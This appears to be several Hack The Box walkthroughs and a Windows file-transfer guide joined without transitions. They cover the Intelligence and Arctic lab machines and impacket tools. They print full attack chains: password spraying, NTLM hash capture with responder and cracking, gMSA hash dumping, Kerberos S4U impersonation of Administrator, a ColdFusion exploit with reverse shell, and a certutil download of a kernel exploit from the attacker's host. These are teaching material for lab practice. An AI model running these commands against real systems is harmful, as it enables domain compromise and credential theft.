C:\>lput /home/kali/file_to_be_uploaded.exe

11. impacket-psexec

Number 11 is an interesting one, psexec is a telnet replacement tool, which is part of the PsTools suite, that you can download from the Microsoft website and it enables command-line based code execution (on remote machines). You don't have to install psexec, but only transfer the binary to the Windows machine via a method of your choice. Interestingly, psexec has been used in viruses before and thus is sometimes picked up by third-party anti-virus scanners. Interestingly^2, prior to version 2.1 the traffic was apparently not encrypted so you might want to check which version is present to see if your passwords are sent in a secure manner. Execution is only possible if realtime-detection is disabled (at least it was on my Windows 10 Test-System) and as all the exec parts of impacket, this does not have an inherent upload functionality, but can copy remote binaries / code.

impacket-psexec <username>:<password>@<windows_machine_ip>
Impacket v0.9.24.dev1+20210815.200803.5fd22878 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.10.....
[*] Found writable share ADMIN$
[*] Uploading file FvVjzAJr.exe
[*] Opening SVCManager on 10.10.10.10.....
[*] Creating service NKIK on 10.10.10.10.....
[*] Starting service NKIK.....
Microsoft Windows [Version 10.0.19043.928]
(c) Microsoft Corporation. All rights reserved.

C:\Windows> psexec.exe \\<attackerIP> -u <username> -p <password> -c -csrc "<path_to_file_to_be_uploaded, e.g. C:\path to\PowerView.ps1>" <new_filename_on_windows_box>

12. impacket-smbserver

The smbserver is a neat tool, that is usable in two ways. One - you can use it as a remote network drive to run executables off of directly. Two - you can copy the desired files from/to the smbserver, e.g. via the copy or cp commands Three ;) - you can capture hashes using the smbserver and then crack the hash or relay/pass it (tip: try your hands on the box Buff on hackthebox.com, you can use this technique)

Typically this works fairly well, should you encounter issues then smb-signing or smb2 might be the culprits. The latter can be solved easily via the -smb2support flag.

# on your machine
impacket-smbserver -smb2support <name_of_the_share (you can choose any)> .  
Impacket v0.9.24.dev1+20210815.200803.5fd22878 - Copyright 2021 SecureAuth Corporation

# on the Windows machine
copy \\<attackerIP>\<name_of_the_share>\file_to_be_uploaded.exe .

# what you will see on your machine afterwards

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.100,63109)

13. impacket-smbexec

Impackets' smbexec works in a very similar way to psexec, it uploads an executable that will start a service and thus offer a reverse shell back to our script.

It is also detected by current real-time protection enabled Microsoft Defender. The error you might receive looks something like this: SMB SessionError: STATUS_OBJECT_NAME_NOT_FOUND(The object name is not found.). The resulting shell is only a semi-interactive shell and some commands might not work in this one (pwd among others). Technically this semi-interactive shell also does not have the ability to upload files per-se but you can combine it with certutil or iex or another method from the living off the land section.

impacket-smbexec <username>:<password>@<windowsIP>
Impacket v0.9.24.dev1+20210815.200803.5fd22878 - Copyright 2021 SecureAuth Corporation

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>
```cer

### 14. impacket-atexec
Atexec is a Task Scheduler Service based remote code execution method that can be employed if you have credentials for the remote Windows box. 
It is a little more on the complex side, because you only get remote command execution but no interactive shell or pseudoshell. 
You could however use it to transfer files with the living of the land or impacket-smbserver methods.
```bash
impacket-atexec <username>:<password>@<windowsIP> <command_to_run (e.g. whoami)>
Impacket v0.9.24.dev1+20210815.200803.5fd22878 - Copyright 2021 SecureAuth Corporation

[!] This will work ONLY on Windows >= Vista
[*] Creating task \gVldUnwT
[*] Running task \gVldUnwT
[*] Deleting task \gVldUnwT
[*] Attempting to read ADMIN$\Temp\gVldUnwT.tmp
[*] Attempting to read ADMIN$\Temp\gVldUnwT.tmp
nt authority\system

Shoutout and thank you for reading all of this!

I would like to thank you again for staying with me and learning new things on a daily basis. The sheer amount of information and options available to perform tasks such as uploading a file to a remote host is astonishing for me. It is one of the reasons why I continue to thrive in cybersecurity and why it is by far the most interesting field I have ever dabbled in. Thank you for reading until here and should you have any other tools that you use to upload things to Windows machines feel encouraged to share them in the comment section.

Until next time, You are wizards, purple wizards.

The first thing we always do is a ping-check. We can enumerate the TTL (time to live) and identify the host operating system based on it. TTL of about 64 means it's most likely a Linux-based machine, around 128 means it's a Windows-based box, and values of about 254 are Solaris-based boxes.

TTL

A detailed explanation of TTL: It represents the number of routers a packet is allowed to be passed through before expiring. For every router this number is decreased by 1, meaning if a Windows box should have 128 - but we see TTL 127 - then one router is between us and the box.

Ping check

PING 10.10.10.248 (10.10.10.248) 56(84) bytes of data.
64 bytes from 10.10.10.248: icmp_seq=1 ttl=127 time=36.7 ms

We receive a TTL of 127 which indicates it is a Windows box. That is interesting and provides some details for potential next steps later during the enumeration (check for Active Directory, Kerberoasting, AS-REP roasting, unconstrained delegation and more).

As usual the next step is :drum roll: - port scanning

Port Scanning with nmap

We note down interesting ports as well as a very large time skew of about 7h. The time skew could force us to sync our local machine time to the remote machine during a later stage (noted.)

nmap -sCV -T4 -p- 10.10.10.248 -oN intelligence.full                                                                                                                                                      
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-24 16:56 CEST
Nmap scan report for localhost (10.10.10.248)
Host is up (0.036s latency).
Not shown: 65515 filtered ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
80/tcp    open  http          Microsoft IIS httpd 10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2021-08-24 21:59:38Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-24T22:01:08+00:00; +7h01m48s from scanner time.
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-24T22:01:08+00:00; +7h01m48s from scanner time.
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-24T22:01:08+00:00; +7h01m48s from scanner time.
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2021-08-24T22:01:08+00:00; +7h01m48s from scanner time.
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49691/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49692/tcp open  msrpc         Microsoft Windows RPC
49711/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
62733/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h01m47s, deviation: 0s, median: 7h01m47s
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-08-24T22:00:30
|_  start_date: N/A

We find port 53 (DNS) / 88 (Kerberos) / 389 (LDAP) which indicates that this is a domain controller. The other interesting open ports are RPC (135 and many more), SMB (139/445), HTTP (80), Win-RM (5985).

remember for OSCP: from an attacker perspective, you would try the ports with the least effort first, which in this case would be:

139/445 - anonymous login via SMB (or guest accounts for that matter) 389 - anonymous LDAP enumeration to check if we can read the LAPS (local administrator password solution) 80 - Webserver - check for hidden files / credentials / subdomains

directory busting / finding reachable files

Recently I started testing feroxbuster but for this box I used gobuster again. Running gobuster dir reveals one interesting folder - documents/.

gobuster dir -fr -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.10.248/ -x php,html,txt -t 100 -k
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.248/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php,html,txt
[+] Add Slash:               true
[+] Follow Redirect:         true
[+] Timeout:                 10s
===============================================================
2021/08/24 17:21:48 Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 7432]
/documents/           (Status: 403) [Size: 1233]

===============================================================
2021/08/24 17:27:27 Finished
===============================================================

We jot that down into our notes and add the IP into our /etc/hosts file to enumerate subdomains via gobuster dns, since DNS is available on the box (port 53). Unfortunately, this does not show any results.

sudo su
echo "10.10.10.248 intelligence.htb" >> /etc/hosts

gobuster dns -d 10.10.10.248 -c -i -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt

Web application

Checking the web application we find two downloadable pdf documents and looking at them we conduct that they are potentially numbered using a date pattern (YYYY-MM-DD-upload.pdf). So why don't we write a script to download all the files and go through them?!

#!/usr/bin/env python

import requests
import os
# http://intelligence.htb/documents/2020-01-02-upload.pdf

os.mkdir('documents')
BASE_URL = 'http://intelligence.htb/documents/2020-'


for month in range(1,12):
  for day in range(1,31):

    specifics =  f'{month:02}-{day:02}-upload.pdf'
    file = requests.get(BASE_URL+specifics)
    if file.status_code == 200:
        with open(f'documents/{specifics}', 'wb') as f:
            f.write(file.content)
    else:
        continue

Now we could check the pdf's manually (which is what I did) or we use pdftotext:

for file in *.pdf; do pdftotext $file - >> text.txt; done

this reveals a lot of lorem ipsum text (this is placeholder gibberish in a non-existing language that resembles "normal" text and is frequently used in web development to visualize what "normal" text would look like) but also two notes from the IT department that are very very interesting for us - one in particular because it contains a password - NewIntelligenceCorpUser9876, but what is a password without a username?! Nothing!

We also check the metadata of the pdf's and find :drum roll: some names that look like real people names.

#!/bin/bash
touch names.txt

for f in documents/*.pdf
do
strings $f | grep /Creator | awk '{ print $2 }' >> names.txt
done
exit

that gives us the following output:

(TeX)
(Jason.Patterson)

Since we only want the unique usernames and also neither the TeX nor the parantheses - we use sort -u to filter them and then remove the parentheses + the Tex by hand (old school. maybe) and add a space instead of the . between the first name and the last name.

cat names.txt | sort -u > unique_names.txt

foothold

So now we have usernames and we could use namemash.py to generate a potential windows username list. But let's try to enumerate usernames with kerbrute.

username enumeration with kerbrute

./kerbrute_linux_amd64_1.0.3 userenum --dc 10.10.10.248 -d intelligence.htb ~/ctf/htb/intelligence/documents/names.txt 
    __             __               __                  
   / /_____  _____/ /_  _______  __/ /____  
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \      
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/       
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 08/25/21 - Ronnie Flathers @ropnop

2021/08/25 11:56:24 >  Using KDC(s):     
2021/08/25 11:56:24 >   10.10.10.248:88      

2021/08/25 11:56:24 >  [+] VALID USERNAME:       William.Lee@intelligence.htb 
2021/08/25 11:56:24 >  [+] VALID USERNAME:       Scott.Scott@intelligence.htb

...
(shortened for educational purposes ;) )
...

2021/08/25 11:56:24 >  Done! Tested 78 usernames (78 valid) in 0.297 seconds

Next on our todo list is checking if the password works for an account actually - the stage is yours crackmapexec.

poetry run crackmapexec ldap 10.10.10.248 -u ~/ctf/htb/intelligence/documents/names.txt -p 'NewIntelligenceCorpUser9876'  

...
LDAP        10.10.10.248    389    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

Ms. Tiffany Molina has not changed her password apparently and we can log in using her account. LDAP did not reveal interesting things so we try SMB and voila, there are two non-standard shares (Users / IT).

user flag + webserver script

smbclient -L \\\\10.10.10.248\\ -U Tiffany.Molina -p

Enter WORKGROUP\Tiffany.Molina's password: 

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        IT              Disk      
        NETLOGON        Disk      Logon server share 
        SYSVOL          Disk      Logon server share 
        Users           Disk      
SMB1 disabled -- no workgroup available

in Users/tiffany.molina/Desktop we find the user flag, while in the IT share we find a powershell script called downdetector.ps1.

The interesting part of this script, which checks if a webserver is up periodically (every 5 minutes), is that it uses -UseDefaultCredentials while visiting the website and we could abuse this via responder, because responder tells the browser to please authenticate to it using NTLM. We then catch the NTLM hash and potentially (most likely) are able to crack the hash and get Mr. Ted Graves password.

# downdetector.ps1
# Check web server status. Scheduled to run every 5min                                                                                                                                
Import-Module ActiveDirectory-                                                  
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {                                                                           
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {                                                       
Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
}                                                                               
} catch {}                                                                      
}

adding a DNS entry via LDAP 🤯

For this to work, we need to add a A record to the DNS entries. How could we do this from the outside?! There is a tool called dnstool.py which is used (https://github.com/dirkjanm/krbrelayx#dnstoolpy), to create DNS entries via LDAP - mind blown 🤯.

python3 dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webroot.intelligence.htb -d 10.10.14.15 10.10.10.248
[-] Connecting to host...
[-] Binding to host
[+] Bind OK
/opt/windows/krbrelayx/dnstool.py:241: DeprecationWarning: please use dns.resolver.Resolver.resolve() instead 
  res = dnsresolver.query(zone, 'SOA')
[-] Adding new record
[+] LDAP operation completed successfully

catching the hash with responder

So now we have created a DNS A Record on the DNS server of the Domain. In theory, if we run responder.py now, we should be able to capture a hash. If I remember correctly, we had to run it in analyze mode (-A) in order to capture the hash, without poisoning the response.

sudo responder -I tun0 -A

TED.GRAVES::intelligence:4ca6e63382f18321:08aef3a49570336d5bd888349ffca65c:010100000000000018f67c60fb99d7018dfd1338289e0ea700000000020008004a004a005300390001001e00570049004e002d0043005000350056004d005a005a004400510031005200040014004a004a00530039002e004c004f00430041004c0003003400570049004e002d0043005000350056004d005a005a0044005100310052002e004a004a00530039002e004c004f00430041004c00050014004a004a00530039002e004c004f00430041004c0008003000300000000000000000000000002000002c3fc3c6700878c995085dd56d2a2e8985dc5a10c687e986d4079d5b7e75e9710a0010000000000000000000000000000000000009003a0048005400540050002f0077006500620072006f006f0074002e0069006e00740065006c006c006900670065006e00630065002e006800740062000000000000000000:Mr.Teddy

# hashcat -m 5600 intelligence.txt rockyou.txt

We crack the NTLMv2-hash using rockyou and hashcat in a couple of seconds and are now able to use new credentials to authenticate and check SMB first but don't find anything interesting. So what about delegations you ask, yes lets check delegation potential with the new credentials.

checking for potential delegation

impacket-findDelegation intelligence.htb/Ted.Graves:Mr.Teddy
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

AccountName  AccountType                          DelegationType                      DelegationRightsTo      
-----------  -----------------------------------  ----------------------------------  -----------------------
svc_int$     ms-DS-Group-Managed-Service-Account  Constrained w/ Protocol Transition  WWW/dc.intelligence.htb

The user Ted Graves is able to delegate rights to the svc_int$ machine account, interesting. machine accounts are sometimes also called computer accounts and are exactly that, the accounts of the computer that is used for e.g. requesting tickets from the domain controller, they are identified via the $ sign at the end of their name.

We also see that it is a Group Managed Service Accounts (GMSA) and that the ServicePrincipalName (SPN) is WWW/dc.intelligence.htb

gmsa what now?

Service Accounts often have their passwords set once and are never changed after, this is security risk and can be mitigated via gMSA (group managed service accounts). This means that the Domain (Controller?) is able to change the password based on a regular schedule and that means someone has to be able to read the password in clear text, because otherwise no one would know what the current password is. So users that are able to read gMSA, can read the password (hash) (that might also be a security risk..., right Microsoft!?) similar to LAPS, where you can sometimes read the admin password in clear text...

We can use a tool called gMSADumper.py (https://github.com/micahvandeusen/gMSADumper/blob/main/gMSADumper.py) which does exactly as the name suggests, dump the password hash if the user we provide is able to read it. Let's try that:

python3 gMSADumper.py -u Ted.Graves -p Mr.Teddy -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::5e47bac787e5e1970cf9acdb5b316239

TADAAAAAA. we have the password hash, which we can use to dump tickets potentially via impacket's getST. In order to escalate our privileges, we will try to get a ticket for the administrator account, because why not?!

Get a Ticket

impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -impersonate Administrator -dc-ip 10.10.10.248 -hashes :5e47bac787e5e1970cf9acdb5b316239
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)

This fails because the clock skew is too great - the what now?! As mentioned at the beginning too great of a time difference can cause the scripts to fail. So how do we fix this you ask?! We use NTP - network time protocol, and specifically, ntpdate which is a command-line tool to use an external network time server. As far as I know Domain Controllers sometimes also act as NTP servers and we have a domain controller here, so let's try to sync our time with the machine via ntpdate -

timedatectl set-ntp true
sudo apt-get install ntpdate
sudo ntpdate 10.10.10.248                                                                  
26 Aug 19:35:08 ntpdate[17403]: step time server 10.10.10.248 offset +25308.747794 sec

impacket-getST intelligence.htb/svc_int$ -spn WWW/dc.intelligence.htb -impersonate Administrator -dc-ip 10.10.10.248 -hashes :5e47bac787e5e1970cf9acdb5b316239
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for user
[*] Impersonating Administrator
[*]     Requesting S4U2self
[*]     Requesting S4U2Proxy
[*] Saving ticket in Administrator.ccache

Tadaaaa we get a ticket for the administrator :O so the only thing left for us to figure out is how to use this ticket to authenticate, so we ask our favorite friend google and it tells us to export the ticket to an environment variable called KRB5CCNAME (https://www.onsecurity.io/blog/abusing-kerberos-from-linux/)

export KRB5CCNAME=Administrator.ccache

now we should be able to use psexec (impacket) to get a shell as admin, right?! right!

root access and shell

psexec.py intelligence.htb/Administrator@dc.intelligence.htb -k -no-pass -dc-ip 10.10.10.248 -target-ip 10.10.10.248
Impacket v0.9.23 - Copyright 2021 SecureAuth Corporation

[*] Requesting shares on 10.10.10.248..... 
[*] Found writable share ADMIN$
[*] Uploading file AWLtKrZo.exe
[*] Opening SVCManager on 10.10.10.248.....
[*] Creating service IJDk on 10.10.10.248.....
[*] Starting service IJDk.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
nt authority\system

c:\Users\Administrator\Desktop>type root.txt
6c0dbe0...<redacted>

Another option is to use evil-winrm or impacket's smbclient:

python3 /usr/share/doc/python3-impacket/examples/smbclient.py -k intelligence.htb/Administrator@dc.intelligence.htb -no-pass

Shout outs

Thank you to GameDadel, Trismah, fluxesss, aynkl2 and last but not least 0reoByte for joining the stream, giving me money to do something I love and for generally being awesome.

Until next time, friends.

Keep hacking the world and learn AD ;)

The way I approach CTF machines is very much a go to grow mentality. When I started 6 months ago, I did not know how to collect the necessary information to enumerate, let alone compromise any machine/environment. Trial and error is the best friend during this journey and I will share my errors with you, so you don't have to necessarily make all the same mistakes I did.

Mindset

Your mental model is the most important thing you potentially don't have yet but might need to develop. It is about abstracting the things you want to explore - e.g. if you find a webserver and that one is also a mailserver in your head you could create a mental model of the attack surface - what can you try, which possibilities for compromise are you aware of and how can you exploit these potentially. Follow your methodology, it is the strongest supporter for you.

if you want to follow my methodology, feel free to copy this this template: https://maikroservice.notion.site/CTF-TEMPLATE-1d8ada6a7df441e9a5976e51c1d74fac

Ping

The first thing I normally do is to check the ICMP response by pinging the box. The result you receive back will show potentially valuable information e.g. the TTL (time to live), if this is around 127 it is a windows box most likely, while numbers around 64 indicate a linux based machine.

ping 10.10.10.11

This box does not respond to ping - Windows boxes sometimes don't respond to ping unless it is enabled AFAIK, so probably this is the reason why we do not get a response here.

Port Scan

Next up is the classical port scan, you can use nmap or rustscan or other tools to identify open ports. This scan is usually done in an incremental manner, nmap scans the top 1000 ports by default and with the flags used below will enumerate Versions (-sV) and run default scripts (-sC), these two can be combined to -sCV. T4 indicates the speed with which the scan is conducted, it goes from T1 (slow) to T5 (fast). Since the box does not respond to ping we use the -Pn option to skip the host discovery part of the scan. Finally, the output should be saved to a file in a "normal" format and this is achieved by using -oN followed by the file name - I usually use *.initial for the top 1000 scan, *.full for the full 65535 TCP ports and *.udp for UDP scans.

nmap -sCV -T4 -Pn 10.10.10.11 -oN arctic.initial

We get back a result with three open ports, two out of those are fairly common (135 & 49154, both associated with Windows remote procedure call - RPC) - from experience those are fairly rarely involved in exploits directly so lets first focus on low hanging fruits, namely port 8500. Whenever I see a uncommon port as the only source I open it in my browser via <ip>:<port> - so in this case 10.10.10.11:8500, which reveals Adobe Coldfusion. Let's check if there are any known exploits for that.

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-16 19:41 CEST
Nmap scan report for 10.10.10.11
Host is up (0.038s latency).
Not shown: 997 filtered ports
PORT      STATE SERVICE VERSION
135/tcp   open  msrpc   Microsoft Windows RPC
8500/tcp  open  fmtp?
49154/tcp open  msrpc   Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service Enumeration / Exploit

We did find Adobe Coldfusion (v8) via the last step and use exploit-db.com to check for any known exploits. We find https://www.exploit-db.com/exploits/50057 and modify it to include our virtual network interface IP (usually accessible via ifconfig tun0).

lhost = "10.10.16.4"
lport = 4444
rhost = "10.10.10.11"
rport = 8500

Once we did that we can fire the exploit and catch a reverse shell as tolis and find the user.txt flag on their Desktop.

c:\Users\tolis\Desktop>dir
dir
user.txt

Post Exploitation

on the machine we are greeted with a command prompt of a very old windows

Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.

This indicates a kernel exploit - we can check for some and in the end find MS10-059 or Chimichurri (https://github.com/egre55/windows-kernel-exploits/tree/master/MS10-059: Chimichurri/Compiled) as a suitable candidate. Lets download the precompiled binary and upload it to the target.

A suitable method to do that is a python webserver on your local machine, I use the python 3 version via:

python3 -m http.server 8080

and then

certutil -urlcache -f http://<myMachineIP>:8080/chimichurri.exe

to download the file on the target machine. Typical folders where this can be executed are the Document/Download folder of the compromised user and the c:\windows\temp folder. Other options would be impacket's smbserver or smtp/sftp (we will explore the impacket-smbserver on the next machine)

Back to Chimichurri - The exploit, when executed targets the Tracing Service of Windows (more details here: https://itm4n.github.io/chimichurri-reloaded/) and is able to elevate out privileges to NT Authority\System. Let's try that and provide our local IP and a port to catch the shell on -

Chimichurri.exe 10.10.14.18 9001
/Chimichurri/-->This exploit gives you a Local System shell 
/Chimichurri/-->Changing registry values...
/Chimichurri/-->Got SYSTEM token...
/Chimichurri/-->Running reverse shell...
/Chimichurri/-->Restoring default registry values...

We can now read the root.txt and have rooted the box. Good job.

nc -lvnp 9001                          
listening on [any] 9001 ...            
connect to [10.10.14.18] from (UNKNOWN) [10.10.10.11] 49440                          
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation.  All rights reserved.
C:\Users\tolis\AppData\Local\Temp>whoami
whoami
nt authority\system
C:\Users\Administrator\Desktop>dir
dir
root.txt